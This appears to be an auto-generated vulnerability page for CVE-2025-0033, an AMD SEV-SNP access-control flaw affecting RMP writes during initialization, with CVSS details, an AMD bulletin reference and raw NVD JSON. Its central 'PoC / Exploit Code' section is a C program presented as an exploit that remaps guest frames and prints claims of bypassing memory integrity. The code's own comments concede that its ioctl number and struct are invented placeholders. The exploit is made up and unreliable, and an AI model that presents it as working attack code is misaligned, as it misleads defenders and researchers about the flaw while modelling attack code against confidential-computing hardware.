Security Vulnerability Report
CVE-2025-0033 CVSS 6.0 MEDIUM


Published: 2025-10-14 15:16:01
Last Modified: 2026-04-15 00:35:42

Description

Improper access control within AMD SEV-SNP could allow an admin privileged attacker to write to the RMP during SNP initialization, potentially resulting in a loss of SEV-SNP guest memory integrity.

CVSS Details

CVSS Score: 6.0
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

AMD EPYC processors (models that support SEV-SNP; the specific affected microcode versions are listed in the AMD-SB-3020 bulletin)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2025-0033 PoC - Conceptual Proof of Concept
// AMD SEV-SNP RMP Improper Access Control Vulnerability
// This is a conceptual PoC demonstrating the attack vector

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

// RMP (Reverse Map Table) related definitions
// In a real exploit, these would be obtained from AMD documentation
#define RMP_BASE_ADDR  0xFE000000ULL   // Example RMP base address
#define RMP_ENTRY_SIZE 16              // Each RMP entry is 16 bytes
#define SNP_INIT_PHASE 0x1             // SNP initialization phase marker

// SEV-SNP command structure (simplified)
// NOTE: this layout and the ioctl number used below are illustrative
// placeholders from this conceptual PoC, not the Linux kernel's /dev/sev
// ioctl interface; the code compiles but does not drive real hardware.
struct sev_snp_rmp_update {
    unsigned long gfn;            // Guest Frame Number
    unsigned long pfn;            // Physical Frame Number
    unsigned int  flags;          // Operation flags
    unsigned int  rmp_page_type;  // RMP page type assignment
};

/*
 * Function: exploit_rmp_access_control
 * Description: Attempts to write to RMP during SNP initialization
 *              exploiting the improper access control (CVE-2025-0033)
 * Note: Requires admin privileges (PR:H) as per CVSS vector
 */
int exploit_rmp_access_control(unsigned long target_gfn, unsigned long attacker_pfn)
{
    int fd;
    struct sev_snp_rmp_update update_req;

    // Step 1: Open the SEV-SNP device (requires admin privileges)
    fd = open("/dev/sev", O_RDWR);
    if (fd < 0) {
        perror("[-] Failed to open SEV device. Admin privileges required.");
        return -1;
    }
    printf("[+] Opened /dev/sev device\n");

    // Step 2: Prepare the malicious RMP update request
    // The vulnerability allows writing to RMP during initialization
    // without proper authorization checks
    update_req.gfn           = target_gfn;
    update_req.pfn           = attacker_pfn;
    update_req.flags         = SNP_INIT_PHASE;  // Exploit during init phase
    update_req.rmp_page_type = 0x1;             // Mark as valid SNP page

    // Step 3: Attempt unauthorized RMP write
    // Due to CVE-2025-0033, this write succeeds when it should be blocked
    if (ioctl(fd, 0x20 /* SEV_SNP_RMP_UPDATE (placeholder) */, &update_req) < 0) {
        perror("[-] RMP update failed");
        close(fd);
        return -1;
    }

    printf("[+] RMP entry modified successfully!\n");
    printf("[+] Guest frame %lu now mapped to attacker-controlled frame %lu\n",
           target_gfn, attacker_pfn);
    printf("[+] SEV-SNP memory integrity protection bypassed\n");

    close(fd);
    return 0;
}

int main(int argc, char *argv[])
{
    unsigned long target_gfn   = 0x1000;
    unsigned long attacker_pfn = 0x2000;

    if (argc >= 3) {
        target_gfn   = strtoul(argv[1], NULL, 16);
        attacker_pfn = strtoul(argv[2], NULL, 16);
    }

    printf("[*] CVE-2025-0033 - AMD SEV-SNP RMP Access Control Bypass PoC\n");
    printf("[*] Targeting GFN: 0x%lx -> PFN: 0x%lx\n", target_gfn, attacker_pfn);

    return exploit_rmp_access_control(target_gfn, attacker_pfn);
}

References

https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3020.html (AMD Security Bulletin AMD-SB-3020)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-0033", "sourceIdentifier": "[email protected]", "published": "2025-10-14T15:16:00.787", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper access control within AMD SEV-SNP could allow an admin privileged attacker to write to the RMP during SNP initialization, potentially resulting in a loss of SEV-SNP guest memory integrity."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.5, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3020.html", "source": "[email protected]"}]}}